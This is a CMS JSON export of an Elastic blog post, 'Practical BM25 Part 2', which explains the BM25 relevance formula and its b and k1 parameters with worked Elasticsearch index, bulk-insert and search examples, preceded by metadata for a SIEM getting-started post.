Guide\u003c/a\u003e.\u003c/p\u003e","category":[{"uid":"bltb79594af7c5b4199","_version":3,"locale":"en-us","ACL":{},"created_at":"2023-11-02T21:51:05.640Z","created_by":"blt3044324473ef223b70bc674c","key":"product","label_l10n":"Product","tags":[],"title":"Product","updated_at":"2024-05-10T13:44:20.209Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"time":"2024-05-10T13:44:53.527Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}],"created_at":"2019-10-09T05:02:20.430Z","created_by":"blte2d3fe60780f6d1d","disclaimer":["blt18e115b4fe7eda5c"],"full_bleed_image":{"_version":2,"is_dir":false,"uid":"blt86429180a5a1c810","ACL":{},"content_type":"image/jpeg","created_at":"2020-01-15T00:56:40.199Z","created_by":"bltf6ab93733e4e3a73","description":"","file_size":"139872","filename":"blog-banner-castle-tower.jpg","parent_uid":null,"tags":[],"title":"blog-banner-castle-tower.jpg","updated_at":"2020-11-25T18:00:30.744Z","updated_by":"bltf6ab93733e4e3a73","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-11-25T18:00:22.998Z","user":"bltf6ab93733e4e3a73"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt86429180a5a1c810/5fbe9bbe65bdd35303e05acc/blog-banner-castle-tower.jpg"},"markdown_l10n":"","product":["siem","beats","elastic cloud","security"],"publish_date":"2019-10-24T16:00:00.000Z","seo":{"seo_title_l10n":"Elastic SIEM for small business and home: Getting started","seo_description_l10n":"Monitoring your servers and workstations does not have to be difficult or expensive. Elastic SIEM is a great way to provide security analytics and monitoring capabilities to small businesses and homes. Check out Part 1 of this new series to find out more.","canonical_tag":"","og_markup":{"facebook_profile_id":""},"noindex":false},"tags":[],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[],"tags_event_type":[],"tags_industry":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[{"title":"Getting started","label_l10n":"Getting started","keyword":"getting-started","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt30953f4176054d3f","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:37:25.148Z","updated_at":"2020-06-17T03:37:25.148Z","ACL":{},"_version":1,"_workflow":{"uid":"blte3b720fd9661d254","updated_at":"2020-06-17T03:37:25.148Z","updated_by":"blt3044324473ef223b70bc674c","version":1},"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-01-07T18:03:25.028Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"bltb1d5b7df835c3535","ACL":{},"created_at":"2023-11-06T21:38:33.456Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"continuous-monitoring","label_l10n":"Continuous monitoring","tags":[],"title":"Continuous monitoring","updated_at":"2023-11-06T21:38:33.456Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.388Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt569b48df66a9ba5d","ACL":{},"created_at":"2020-06-17T03:30:49.259Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security","label_l10n":"Security","tags":[],"title":"Security","updated_at":"2020-07-06T22:20:03.211Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.430Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"bltfa8bcbccaca4dd01","created_by":"bltea6cbb86fea188be","updated_by":"bltea6cbb86fea188be","created_at":"2019-10-24T15:25:30.522Z","updated_at":"2019-10-24T15:25:30.522Z","content_type":"image/jpeg","file_size":"143203","filename":"SIEM-home-blog-thumb.jpg","title":"SIEM-home-blog-thumb.jpg","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-10-24T15:28:38.138Z","user":"bltea6cbb86fea188be"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltfa8bcbccaca4dd01/5db1c26adc674266df3d657d/SIEM-home-blog-thumb.jpg"},"title":"Elastic SIEM for home and small business: Getting started","title_l10n":"Elastic SIEM for home and small business: Getting started","updated_at":"2024-09-13T16:16:13.562Z","updated_by":"bltd9765be97bbed20c","url":"/blog/elastic-siem-for-small-business-and-home-1-getting-started","versions":["7.4"],"publish_details":{"time":"2024-09-13T16:16:19.427Z","user":"bltd9765be97bbed20c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt0920fcce0e3b5d1b","_version":3,"locale":"en-us","ACL":{},"abstract_l10n":"In part two of our three-part Practical BM25 series, learn about the BM25 model and the structure and components of the BM25 formula.","author":["blta239a9edb72d95af"],"body_l10n":"\u003cp\u003e\u003cem\u003eThis is the second post in the three-part \u003c/em\u003e\u003cem\u003e\u003cstrong\u003ePractical BM25\u003c/strong\u003e\u003c/em\u003e\u003cem\u003e series about similarity ranking (relevancy). If you're just joining, check out \u003c/em\u003e\u003ca href=\"/blog/practical-bm25-part-1-how-shards-affect-relevance-scoring-in-elasticsearch\"\u003e\u003cem\u003ePart 1: How Shards Affect Relevance Scoring in Elasticsearch\u003c/em\u003e\u003c/a\u003e\u003cem\u003e.\u003c/em\u003e\u003cbr /\u003e\u003c/p\u003e\u003ch2\u003eThe BM25 model\u003c/h2\u003e\u003cp\u003eI’ll try to dive into the mathematics here only as much as is absolutely necessary to explain what’s happening, but this is the part where we look at the structure of the BM25 formula to get some insights into what’s happening. First we’ll look at the formula, then I’ll break down each component into understandable pieces:\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt78ee47f523d10430/5c57eb6165ace9e30b316318/bm25_equation.png\" data-sys-asset-uid=\"blt78ee47f523d10430\" alt=\"bm25_equation.png\" style=\"display: block;margin: auto;\"/\u003e\u003c/p\u003e\u003cp\u003eWe can see a few common components like \u003cspan style=\"font-family: monospace;\"\u003eq\u003csub\u003ei\u003c/sub\u003e\u003c/span\u003e, \u003cspan style=\"font-family: monospace;\"\u003eIDF(q\u003csub\u003ei\u003c/sub\u003e)\u003c/span\u003e, \u003cspan style=\"font-family: monospace;\"\u003ef(q\u003csub\u003ei\u003c/sub\u003e,D)\u003c/span\u003e, \u003cspan style=\"font-family: monospace;\"\u003ek1\u003c/span\u003e, \u003cspan style=\"font-family: monospace;\"\u003eb\u003c/span\u003e, and something about field lengths. Here’s what each of these is all about:\u003c/p\u003e\u003col\u003e\u003cli\u003e\u003cspan style=\"font-family: monospace;font-weight: bold;\"\u003eq\u003csub\u003ei\u003c/sub\u003e\u003c/span\u003e is the i\u003csup\u003eth\u003c/sup\u003e query term.\u003cbr /\u003e\u003cbr /\u003eFor example, if I search for “shane,” there’s only 1 query term, so \u003cspan style=\"font-family: monospace;\"\u003eq\u003csub\u003e0\u003c/sub\u003e\u003c/span\u003e is “shane”. If I search for “shane connelly” in English, Elasticsearch will see the whitespace and tokenize this as 2 terms: \u003cspan style=\"font-family: monospace;\"\u003eq\u003csub\u003e0\u003c/sub\u003e\u003c/span\u003e will be “shane” and \u003cspan style=\"font-family: monospace;\"\u003eq\u003csub\u003e1\u003c/sub\u003e\u003c/span\u003e will be “connelly”. These query terms are plugged into the other bits of the equation and all of it is summed up.\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-family: monospace;font-weight: bold;\"\u003eIDF(g\u003csub\u003ei\u003c/sub\u003e)\u003c/span\u003e is the inverse document frequency\u0026nbsp;of the i\u003csup\u003eth\u003c/sup\u003e query term.\u003cbr /\u003e\u003cbr /\u003eFor those that have worked with TF/IDF before, the \u003ca href=\"https://en.wikipedia.org/wiki/Tf%E2%80%93idf#Inverse_document_frequency\"\u003econcept of IDF\u003c/a\u003e may be familiar to you. If not, no worries! (And if so, note there is a difference between the IDF formula in TF/IDF and IDF in BM25.) \u003cstrong\u003eThe IDF component of our formula measures how often a term occurs in all of the documents and “penalizes” terms that are common.\u003c/strong\u003e The actual formula Lucene/BM25 uses for this part is:\u003cbr /\u003e\u003cbr /\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt18bebfee9a87e296/5c57eb55bfa899f60ba15b67/idf_equation.png\" data-sys-asset-uid=\"blt18bebfee9a87e296\" alt=\"idf_equation.png\" style=\"display: block;margin: auto;\"/\u003e\u003cbr /\u003eWhere docCount is the total number of documents that have a value for the field in the shard (across shards, if you’re using search_type=dfs_query_then_fetch) and \u003cspan style=\"font-family: monospace;\"\u003ef(q\u003csub\u003ei\u003c/sub\u003e)\u003c/span\u003e is the number of documents which contain the i\u003csup\u003eth\u003c/sup\u003e query term. We can see in our example that “shane” occurs in all 4 documents so for the term “shane” we end up with an IDF(“shane”) of:\u003cbr /\u003e\u003cbr /\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltb896e17d75e25be6/5c57eb4f22d96be10bcca3aa/idf_shane.png\" data-sys-asset-uid=\"bltb896e17d75e25be6\" alt=\"idf_shane.png\" style=\"display: block;margin: auto;\"/\u003e\u003cbr /\u003eHowever, we can see that “connelly” only shows up in 2 documents, so we get an IDF(“connelly”) of:\u003cbr /\u003e\u003cbr /\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt9dbb4a9cc6b1ca1f/5c57eb4952256ff20b4afb50/idf_connelly.png\" data-sys-asset-uid=\"blt9dbb4a9cc6b1ca1f\" alt=\"idf_connelly.png\" style=\"display: block;margin: auto;\"/\u003e\u003cbr /\u003eWe can see here that queries containing these rarer terms (“connelly” being rarer than “shane” in our 4-document corpus) have a higher multiplier, so they contribute more to the final score. This makes intuitive sense: the term “the” is likely to occur in nearly every English document, so when a user searches for something like “the elephant,” “elephant” is probably more important — and we want it to contribute more to the score — than the term “the” (which will be in nearly all documents).\u003cbr /\u003e\u003c/li\u003e\u003cli\u003eWe see that the length of the field is divided by the average field length in the denominator as \u003cspan style=\"font-family: monospace;font-weight: bold;\"\u003efieldLen/avgFieldLen\u003c/span\u003e.\u003cbr /\u003e\u003cbr /\u003eWe can think of this as how long a document is relative to the average document length. If a document is longer than average, the denominator gets bigger (decreasing the score) and if it’s shorter than average, the denominator gets smaller (increasing the score). Note that the implementation of field length in Elasticsearch is based on number of terms (vs something else like character length). This is exactly as described in the original BM25 paper, though we do have a special flag (\u003ca href=\"/guide/en/elasticsearch/reference/current/index-modules-similarity.html\"\u003ediscount_overlaps\u003c/a\u003e) to handle synonyms specially if you so desire. \u003cstrong\u003eThe way to think about this is that the more terms in the document — at least ones not matching the query — the lower the score for the document.\u003c/strong\u003e Again, this makes intuitive sense: if a document is 300 pages long and mentions my name once, it’s less likely to have as much to do with me as a short tweet which mentions me once.\u003c/li\u003e\u003cli\u003eWe see a variable \u003cspan style=\"font-family: monospace;font-weight: bold;\"\u003eb\u003c/span\u003e which shows up in the denominator and that it’s multiplied by the ratio of the field length we just discussed. \u003cstrong\u003eIf \u003c/strong\u003e\u003cspan style=\"font-family: monospace;\"\u003e\u003cstrong\u003eb\u003c/strong\u003e\u003c/span\u003e\u003cstrong\u003e is bigger, the effects of the length of the document compared to the average length are more amplified.\u003c/strong\u003e To see this, you can imagine if you set \u003cspan style=\"font-family: monospace;\"\u003eb\u003c/span\u003e to 0, the effect of the length ratio would be completely nullified and the length of the document would have no bearing on the score. \u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/index-modules-similarity.html\"\u003eBy default, \u003cspan style=\"font-family: monospace;\"\u003eb\u003c/span\u003e has a value of 0.75 in Elasticsearch\u003c/a\u003e.\u003c/li\u003e\u003cli\u003eFinally, we see two components of the score which show up in both the numerator and the denominator: \u003cspan style=\"font-family: monospace;font-weight: bold;\"\u003ek1\u003c/span\u003e and \u003cspan style=\"font-family: monospace;font-weight: bold;\"\u003ef(q\u003csub\u003ei\u003c/sub\u003e,D)\u003c/span\u003e. Their appearance on both sides makes it hard to see what they do by just looking at the formula, but let’s jump in quickly.\u003col\u003e\u003cli\u003e\u003cspan style=\"font-family: monospace;font-weight: bold;\"\u003ef(q\u003csub\u003ei\u003c/sub\u003e,D)\u003c/span\u003e is “how many times does the i\u003csup\u003eth\u003c/sup\u003e query term occur in document D?” In all of these documents, f(“shane”,D) is 1, but f(“connelly”,D) varies: it’s 1 for documents 3 and 4, but 0 for documents 1 and 2. If there were a 5 \u003csup\u003eth\u003c/sup\u003e document which had the text “shane shane,” it would have f(“shane”,D) of 2. We can see that \u003cspan style=\"font-family: monospace;\"\u003ef(q\u003csub\u003ei\u003c/sub\u003e,D)\u003c/span\u003e is in both the numerator and the denominator, and there’s that special “\u003cspan style=\"font-family: monospace;\"\u003ek1\u003c/span\u003e” factor which we’ll get to next. \u003cstrong\u003eThe way to think about \u003c/strong\u003e\u003cspan style=\"font-family: monospace;\"\u003e\u003cstrong\u003ef(q\u003c/strong\u003e\u003csub\u003e\u003cstrong\u003ei\u003c/strong\u003e\u003c/sub\u003e\u003cstrong\u003e,D)\u003c/strong\u003e\u003c/span\u003e\u003cstrong\u003e is that the more times the query term(s) occur a document, the higher its score will be.\u003c/strong\u003e This makes intuitive sense: a document that has our name in it lots of time is more likely to be related to us than a document that has it only once.\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-family: monospace;font-weight: bold;\"\u003ek1\u003c/span\u003e is a variable which helps determine \u003ca href=\"/guide/en/elasticsearch/guide/current/pluggable-similarites.html#bm25-saturation\"\u003eterm frequency saturation\u003c/a\u003e characteristics. That is, it limits how much a single query term can affect the score of a given document. It does this through approaching an \u003ca href=\"https://en.wikipedia.org/wiki/Asymptote\"\u003easymptote\u003c/a\u003e. You can see the comparison of BM25 against TF/IDF in this:\u003cbr /\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt69235a8d75917f47/5c57eb4322d96be10bcca3a4/term_frequency_saturation.png\" data-sys-asset-uid=\"blt69235a8d75917f47\" alt=\"term_frequency_saturation.png\" style=\"display: block;margin: auto;\"/\u003e\u003cbr /\u003eA higher/lower \u003cspan style=\"font-family: monospace;\"\u003ek1\u003c/span\u003e value means that the slope of “tf() of BM25” curve changes. This has the effect of changing how “terms occurring extra times add extra score.” An interpretation of \u003cspan style=\"font-family: monospace;\"\u003ek1\u003c/span\u003e is that for documents of the average length, it is the value of the term frequency that gives a score of half the maximum score for the considered term. The curve of the impact of tf on the score grows quickly when tf() ≤ \u003cspan style=\"font-family: monospace;\"\u003ek1\u003c/span\u003e and slower and slower when tf() \u0026gt; \u003cspan style=\"font-family: monospace;\"\u003ek1\u003c/span\u003e.\u003cbr /\u003e\u003cbr /\u003eContinuing with our example, with \u003cspan style=\"font-family: monospace;\"\u003ek1\u003c/span\u003e we’re controlling the answer to the question “how much more should adding a second ‘shane’ to the document contribute to the score than the first or the third compared to the second?” A higher \u003cspan style=\"font-family: monospace;\"\u003ek1\u003c/span\u003e means that the score for each term can continue to go up by relatively more for more instances of that term. A value of 0 for \u003cspan style=\"font-family: monospace;\"\u003ek1\u003c/span\u003e would mean that everything except \u003cspan style=\"font-family: monospace;\"\u003eIDF(q\u003csub\u003ei\u003c/sub\u003e)\u003c/span\u003e would cancel out. \u003ca href=\"/guide/en/elasticsearch/reference/current/index-modules-similarity.html\"\u003eBy default, k1 has a value of 1.2 in Elasticsearch\u003c/a\u003e.\u003c/li\u003e\u003c/ol\u003e\u003c/li\u003e\u003c/ol\u003e\u003ch2\u003eRevisiting our search with our new knowledge\u003c/h2\u003e\u003cp\u003eWe’ll delete our \u003cspan style=\"font-family: monospace;\"\u003epeople\u003c/span\u003e index and recreate it with just 1 shard so that we don’t have to use search_type=dfs_query_then_fetch. We’ll test our knowledge by setting up three indices: one with the value of \u003cspan style=\"font-family: monospace;\"\u003ek1\u003c/span\u003e to 0 and \u003cspan style=\"font-family: monospace;\"\u003eb\u003c/span\u003e to 0.5 and a second index (\u003cspan style=\"font-family: monospace;\"\u003epeople2\u003c/span\u003e) with the value of \u003cspan style=\"font-family: monospace;\"\u003eb\u003c/span\u003e to 0 and of \u003cspan style=\"font-family: monospace;\"\u003ek1\u003c/span\u003e to 10 and a third index (\u003cspan style=\"font-family: monospace;\"\u003epeople3\u003c/span\u003e) with a value of \u003cspan style=\"font-family: monospace;\"\u003eb\u003c/span\u003e to 1 and \u003cspan style=\"font-family: monospace;\"\u003ek1\u003c/span\u003e to 5.\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003eDELETE people\u003cbr /\u003ePUT people\u003cbr /\u003e{\u003cbr /\u003e \"settings\": {\u003cbr /\u003e \"number_of_shards\": 1,\u003cbr /\u003e \"index\" : {\u003cbr /\u003e \"similarity\" : {\u003cbr /\u003e \"default\" : {\u003cbr /\u003e \"type\" : \"BM25\",\u003cbr /\u003e \"b\": 0.5,\u003cbr /\u003e \"k1\": 0\u003cbr /\u003e }\u003cbr /\u003e }\u003cbr /\u003e }\u003cbr /\u003e }\u003cbr /\u003e}\u003cbr /\u003ePUT people2\u003cbr /\u003e{\u003cbr /\u003e \"settings\": {\u003cbr /\u003e \"number_of_shards\": 1,\u003cbr /\u003e \"index\" : {\u003cbr /\u003e \"similarity\" : {\u003cbr /\u003e \"default\" : {\u003cbr /\u003e \"type\" : \"BM25\",\u003cbr /\u003e \"b\": 0,\u003cbr /\u003e \"k1\": 10\u003cbr /\u003e }\u003cbr /\u003e }\u003cbr /\u003e }\u003cbr /\u003e }\u003cbr /\u003e}\u003cbr /\u003ePUT people3\u003cbr /\u003e{\u003cbr /\u003e \"settings\": {\u003cbr /\u003e \"number_of_shards\": 1,\u003cbr /\u003e \"index\" : {\u003cbr /\u003e \"similarity\" : {\u003cbr /\u003e \"default\" : {\u003cbr /\u003e \"type\" : \"BM25\",\u003cbr /\u003e \"b\": 1,\u003cbr /\u003e \"k1\": 5\u003cbr /\u003e }\u003cbr /\u003e }\u003cbr /\u003e }\u003cbr /\u003e }\u003cbr /\u003e}\u003cbr /\u003e\u003c/pre\u003e\u003cp\u003eNow we’ll add a few documents to all three indices:\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003ePOST people/_doc/_bulk\u003cbr /\u003e{ \"index\": { \"_id\": \"1\" } }\u003cbr /\u003e{ \"title\": \"Shane\" }\u003cbr /\u003e{ \"index\": { \"_id\": \"2\" } }\u003cbr /\u003e{ \"title\": \"Shane C\" }\u003cbr /\u003e{ \"index\": { \"_id\": \"3\" } }\u003cbr /\u003e{ \"title\": \"Shane P Connelly\" }\u003cbr /\u003e{ \"index\": { \"_id\": \"4\" } }\u003cbr /\u003e{ \"title\": \"Shane Connelly\" }\u003cbr /\u003e{ \"index\": { \"_id\": \"5\" } }\u003cbr /\u003e{ \"title\": \"Shane Shane Connelly Connelly\" }\u003cbr /\u003e{ \"index\": { \"_id\": \"6\" } }\u003cbr /\u003e{ \"title\": \"Shane Shane Shane Connelly Connelly Connelly\" }\u003cbr /\u003ePOST people2/_doc/_bulk\u003cbr /\u003e{ \"index\": { \"_id\": \"1\" } }\u003cbr /\u003e{ \"title\": \"Shane\" }\u003cbr /\u003e{ \"index\": { \"_id\": \"2\" } }\u003cbr /\u003e{ \"title\": \"Shane C\" }\u003cbr /\u003e{ \"index\": { \"_id\": \"3\" } }\u003cbr /\u003e{ \"title\": \"Shane P Connelly\" }\u003cbr /\u003e{ \"index\": { \"_id\": \"4\" } }\u003cbr /\u003e{ \"title\": \"Shane Connelly\" }\u003cbr /\u003e{ \"index\": { \"_id\": \"5\" } }\u003cbr /\u003e{ \"title\": \"Shane Shane Connelly Connelly\" }\u003cbr /\u003e{ \"index\": { \"_id\": \"6\" } }\u003cbr /\u003e{ \"title\": \"Shane Shane Shane Connelly Connelly Connelly\" }\u003cbr /\u003ePOST people3/_doc/_bulk\u003cbr /\u003e{ \"index\": { \"_id\": \"1\" } }\u003cbr /\u003e{ \"title\": \"Shane\" }\u003cbr /\u003e{ \"index\": { \"_id\": \"2\" } }\u003cbr /\u003e{ \"title\": \"Shane C\" }\u003cbr /\u003e{ \"index\": { \"_id\": \"3\" } }\u003cbr /\u003e{ \"title\": \"Shane P Connelly\" }\u003cbr /\u003e{ \"index\": { \"_id\": \"4\" } }\u003cbr /\u003e{ \"title\": \"Shane Connelly\" }\u003cbr /\u003e{ \"index\": { \"_id\": \"5\" } }\u003cbr /\u003e{ \"title\": \"Shane Shane Connelly Connelly\" }\u003cbr /\u003e{ \"index\": { \"_id\": \"6\" } }\u003cbr /\u003e{ \"title\": \"Shane Shane Shane Connelly Connelly Connelly\" }\u003cbr /\u003e\u003c/pre\u003e\u003cp\u003eNow, when we do:\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003eGET /people/_search\u003cbr /\u003e{\u003cbr /\u003e \"query\": {\u003cbr /\u003e \"match\": {\u003cbr /\u003e \"title\": \"shane\"\u003cbr /\u003e }\u003cbr /\u003e }\u003cbr /\u003e}\u003cbr /\u003e\u003c/pre\u003e\u003cp\u003eWe can see in \u003cspan style=\"font-family: monospace;\"\u003epeople\u003c/span\u003e that all of the documents have a score of 0.074107975. This matches with our understanding of having \u003cspan style=\"font-family: monospace;\"\u003ek1\u003c/span\u003e set to 0: only the IDF of the search term matters to the score!\u003c/p\u003e\u003cp\u003eNow let’s check \u003cspan style=\"font-family: monospace;\"\u003epeople2\u003c/span\u003e, which has \u003cspan style=\"font-family: monospace;\"\u003eb\u003c/span\u003e = 0 and \u003cspan style=\"font-family: monospace;\"\u003ek1\u003c/span\u003e = 10:\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003eGET /people2/_search\u003cbr /\u003e{\u003cbr /\u003e \"query\": {\u003cbr /\u003e \"match\": {\u003cbr /\u003e \"title\": \"shane\"\u003cbr /\u003e }\u003cbr /\u003e }\u003cbr /\u003e}\u003cbr /\u003e\u003c/pre\u003e\u003cp\u003eThere are two things to take away from the results of this search.\u003c/p\u003e\u003cp\u003eFirst, we can see the scores are purely ordered by the number of times “shane” shows up. Documents 1, 2, 3, and 4 all have “shane” one time and thus share the same score of 0.074107975. Document 5 has “shane” twice, so has a higher score (0.13586462) thanks to f(“shane”,D5) = 2 and document 6 has a higher score yet again (0.18812023) thanks to f(“shane”,D6) = 3. This fits with our intuition of setting \u003cspan style=\"font-family: monospace;\"\u003eb\u003c/span\u003e to 0 in \u003cspan style=\"font-family: monospace;\"\u003epeople2\u003c/span\u003e: the length — or total number of terms in the document — doesn’t affect the scoring; only the count and relevance of the matching terms.\u003c/p\u003e\u003cp\u003eThe second thing to note is that the differences between these scores is non-linear, though it does appear to be pretty close to linear with these 6 documents.\u003c/p\u003e\u003cul\u003e\u003cli\u003eThe score difference between having \u003cem\u003eno occurrences\u003c/em\u003e of our search term and the first is 0.074107975\u003c/li\u003e\u003cli\u003eThe score difference between adding a \u003cem\u003esecond\u003c/em\u003e occurrence of our search term and the first is 0.13586462 - 0.074107975 = 0.061756645\u003c/li\u003e\u003cli\u003eThe score difference between adding a \u003cem\u003ethird\u003c/em\u003e occurrence of our search term and the second is 0.18812023 - 0.13586462 = 0.05225561\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e0.074107975 is pretty close to 0.061756645, which is pretty close to 0.05225561, but they are clearly decreasing. The reason this looks \u003cem\u003ealmost\u003c/em\u003e linear is because \u003cspan style=\"font-family: monospace;\"\u003ek1\u003c/span\u003e is large. We can at least see the score isn’t increasing linearly with additional occurrences — if they were, we’d expect to see the same difference with each additional term. We’ll come back to this idea after checking out \u003cspan style=\"font-family: monospace;\"\u003epeople3\u003c/span\u003e.\u003c/p\u003e\u003cp\u003eNow let’s check \u003cspan style=\"font-family: monospace;\"\u003epeople3, which has \u003cspan style=\"font-family: monospace;\"\u003ek1\u003c/span\u003e = 5 and \u003cspan style=\"font-family: monospace;\"\u003eb\u003c/span\u003e = 1:\u003c/span\u003e\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003eGET /people3/_search\u003cbr /\u003e{\u003cbr /\u003e \"query\": {\u003cbr /\u003e \"match\": {\u003cbr /\u003e \"title\": \"shane\"\u003cbr /\u003e }\u003cbr /\u003e }\u003cbr /\u003e}\u003cbr /\u003e\u003c/pre\u003e\u003cp\u003eWe get back the following hits:\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003e\"hits\": [\u003cbr /\u003e {\u003cbr /\u003e \"_index\": \"people3\",\u003cbr /\u003e \"_type\": \"_doc\",\u003cbr /\u003e \"_id\": \"1\",\u003cbr /\u003e \"_score\": 0.16674294,\u003cbr /\u003e \"_source\": {\u003cbr /\u003e \"title\": \"Shane\"\u003cbr /\u003e }\u003cbr /\u003e },\u003cbr /\u003e {\u003cbr /\u003e \"_index\": \"people3\",\u003cbr /\u003e \"_type\": \"_doc\",\u003cbr /\u003e \"_id\": \"6\",\u003cbr /\u003e \"_score\": 0.10261105,\u003cbr /\u003e \"_source\": {\u003cbr /\u003e \"title\": \"Shane Shane Shane Connelly Connelly Connelly\"\u003cbr /\u003e }\u003cbr /\u003e },\u003cbr /\u003e {\u003cbr /\u003e \"_index\": \"people3\",\u003cbr /\u003e \"_type\": \"_doc\",\u003cbr /\u003e \"_id\": \"2\",\u003cbr /\u003e \"_score\": 0.102611035,\u003cbr /\u003e \"_source\": {\u003cbr /\u003e \"title\": \"Shane C\"\u003cbr /\u003e }\u003cbr /\u003e },\u003cbr /\u003e {\u003cbr /\u003e \"_index\": \"people3\",\u003cbr /\u003e \"_type\": \"_doc\",\u003cbr /\u003e \"_id\": \"4\",\u003cbr /\u003e \"_score\": 0.102611035,\u003cbr /\u003e \"_source\": {\u003cbr /\u003e \"title\": \"Shane Connelly\"\u003cbr /\u003e }\u003cbr /\u003e },\u003cbr /\u003e {\u003cbr /\u003e \"_index\": \"people3\",\u003cbr /\u003e \"_type\": \"_doc\",\u003cbr /\u003e \"_id\": \"5\",\u003cbr /\u003e \"_score\": 0.102611035,\u003cbr /\u003e \"_source\": {\u003cbr /\u003e \"title\": \"Shane Shane Connelly Connelly\"\u003cbr /\u003e }\u003cbr /\u003e },\u003cbr /\u003e {\u003cbr /\u003e \"_index\": \"people3\",\u003cbr /\u003e \"_type\": \"_doc\",\u003cbr /\u003e \"_id\": \"3\",\u003cbr /\u003e \"_score\": 0.074107975,\u003cbr /\u003e \"_source\": {\u003cbr /\u003e \"title\": \"Shane P Connelly\"\u003cbr /\u003e }\u003cbr /\u003e }\u003cbr /\u003e ]\u003cbr /\u003e\u003c/pre\u003e\u003cp\u003eWe can see in \u003cspan style=\"font-family: monospace;\"\u003epeople3\u003c/span\u003e that now the ratio of matching terms (“shane”) to non-matching terms is the only thing that’s affecting relative scoring. So documents like document 3, which has only 1 term matching out of 3 scores lower than 2, 4, 5, and 6, which all match exactly half the terms, and those all score lower than document 1 which matches the document exactly.\u003c/p\u003e\u003cp\u003eAgain, we can note that there’s a “big” difference between the top-scoring documents and the lower scoring documents in \u003cspan style=\"font-family: monospace;\"\u003epeople2\u003c/span\u003e and \u003cspan style=\"font-family: monospace;\"\u003epeople3\u003c/span\u003e. This is thanks (again) to a large value for \u003cspan style=\"font-family: monospace;\"\u003ek1\u003c/span\u003e. As an additional exercise, try deleting \u003cspan style=\"font-family: monospace;\"\u003epeople2\u003c/span\u003e/\u003cspan style=\"font-family: monospace;\"\u003epeople3\u003c/span\u003e and setting them back up with something like \u003cspan style=\"font-family: monospace;\"\u003ek1\u003c/span\u003e = 0.01 and you’ll see that the scores between documents with fewer is smaller. With \u003cspan style=\"font-family: monospace;\"\u003eb\u003c/span\u003e = 0 an \u003cspan style=\"font-family: monospace;\"\u003ek1\u003c/span\u003e = 0.01:\u003c/p\u003e\u003cul\u003e\u003cli\u003eThe score difference between having \u003cem\u003eno occurrences\u003c/em\u003e of our search term and the first is 0.074107975\u003c/li\u003e\u003cli\u003eThe score difference between adding a \u003cem\u003esecond\u003c/em\u003e occurrence of our search term and the first is 0.074476674 - 0.074107975 = 0.000368699\u003c/li\u003e\u003cli\u003eThe score difference between adding a \u003cem\u003ethird\u003c/em\u003e occurrence of our search term and the second is 0.07460038 - 0.074476674 = 0.000123706\u003c/li\u003e\u003c/ul\u003e\u003cp\u003eSo with \u003cspan style=\"font-family: monospace;\"\u003ek1\u003c/span\u003e = 0.01, we can see the score influence of each additional occurrence drops off much faster than with \u003cspan style=\"font-family: monospace;\"\u003ek1\u003c/span\u003e = 5 or \u003cspan style=\"font-family: monospace;\"\u003ek1\u003c/span\u003e = 10. The 4\u003csup\u003eth\u003c/sup\u003e occurrence would add much less to the score than the 3\u003csup\u003erd\u003c/sup\u003e and so on. In other words, the term scores are saturated much faster with these smaller \u003cspan style=\"font-family: monospace;\"\u003ek1\u003c/span\u003e values. Just like we expected!\u003c/p\u003e\u003cp\u003eHopefully this helps see what these parameters are doing to various document sets. With this knowledge, we’ll next jump into how to pick an appropriate \u003cspan style=\"font-family: monospace;\"\u003eb\u003c/span\u003e and \u003cspan style=\"font-family: monospace;\"\u003ek1\u003c/span\u003e and how Elasticsearch provides tools to understand scores and iterate on your approach.\u003c/p\u003e\u003cp\u003e\u003cem\u003eContinue this series with: \u003c/em\u003e\u003ca href=\"/blog/practical-bm25-part-3-considerations-for-picking-b-and-k1-in-elasticsearch\"\u003e\u003cem\u003ePart 3: Considerations for Picking b and k1 in Elasticsearch\u003c/em\u003e\u003c/a\u003e\u003cbr 